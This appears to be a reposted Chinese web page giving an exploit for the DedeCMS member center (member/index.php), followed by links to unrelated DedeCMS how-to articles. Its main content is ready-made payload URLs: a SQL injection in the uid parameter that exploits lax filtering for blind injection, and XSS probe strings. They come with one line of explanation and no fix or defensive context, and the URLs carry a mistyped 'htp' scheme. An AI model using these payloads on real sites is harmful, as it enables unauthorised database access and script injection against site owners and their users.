本文整理自网络,侵删。
EXP:htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';
htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>
htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">
标签:织梦DedeCMS
相关阅读 >>
dedecms 5.6 初始化数据体验包本地测试安装使用方法
织梦DedeCMS站点data目录位置变动调整验证码不显示的解决办法
dedecms实现有短标题时显示短标题、无短标题时显示长标题的方法
lumanager服务器管理软件安装dedecms软件图文教程
详解织梦DedeCMS栏目页分页标题title添加“第n页”的方法
更多相关阅读请进入《织梦DedeCMS》频道 >>
